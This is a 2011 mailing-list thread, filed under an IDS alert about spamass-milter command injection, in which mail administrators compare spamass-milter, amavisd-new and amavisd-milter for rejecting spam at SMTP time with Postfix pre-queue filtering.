> milter without greylisting -- it does all sorts of useful things at
> SMTP-time (before and after DATA), including SPF, DKIM, DNSBLs,
> tarpitting, spamassassin (limited), p0f, and greylisting.
>
> Notes on SA support in Milter-Greylist:
> http://tech.groups.yahoo.com/group/milter-greylist/message/5621
> (Tip for evading Yahoo's cookies: set UserAgent to "Googlebot/2.1")
>

yes milters are great, thx for your work on it

--
Best Regards

MfG Robert Schetterer

Germany/Munich/Bavaria
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
Adam Katz wrote:
> I consider it a mission-critical component to be able to deliver a
> rejection notice at SMTP-time (to avoid backscatter from an emailed
> bounce message). The other systems out there (specifically amavis and
> mailscanner) just can't do this while spamass-milter does it with very
> little overhead or configuration.

amavisd-new can be and is regularly used in pre-queue filtering setups,
especially since the advances in warm-reload and tighter time limiting
control in SpamAssassin 3.3 combined with more recent versions of amavisd.
These advances go hand-in-hand with a new Postfix 2.7.0 option,
smtpd_proxy_options=speed_adjust. In a pre-queue filtering setup
amavisd can do a proper D_REJECT right on the incoming SMTP session,
just like a milter can (but offers added flexibility).

Mark
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
On Fri, Feb 11, 2011 at 09:30:15PM +0100, Mark Martinec wrote:
> Adam Katz wrote:
> > I consider it a mission-critical component to be able to deliver a
> > rejection notice at SMTP-time (to avoid backscatter from an emailed
> > bounce message). The other systems out there (specifically amavis and
> > mailscanner) just can't do this while spamass-milter does it with very
> > little overhead or configuration.
>
> amavisd-new can be and is regularly used in a pre-queue filtering setups,
> especially since the advances in a warm-reload and tighter time limiting
> control on SpamAssasasin 3.3 combined more recent versions of amavisd.
> These advances go hand-in-hand with a Postfix 2.7.0 new option
> smtpd_proxy_options=speed_adjust. In a pre-queue filtering setup
> amavisd can do a proper D_REJECT right on the incoming SMTP session,
> just like a milter can (but offer added flexibility).

And let's not forget that there is also amavisd-milter specifically; it
works fine here. Come on Adam..
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
On Fri, 2011-02-11 at 12:08:35 -0800, Adam Katz wrote:

> I consider it a mission-critical component to be able to deliver a
> rejection notice at SMTP-time (to avoid backscatter from an emailed
> bounce message). The other systems out there (specifically amavis and
> mailscanner) just can't do this while spamass-milter does it with very
> little overhead or configuration.

For posterity, and to hopefully prevent the spread of misinformation via
list archives, the above (specifically with regard to amavisd-new) is
patently false.

--
Sahil Tandon <sahil@FreeBSD.org>
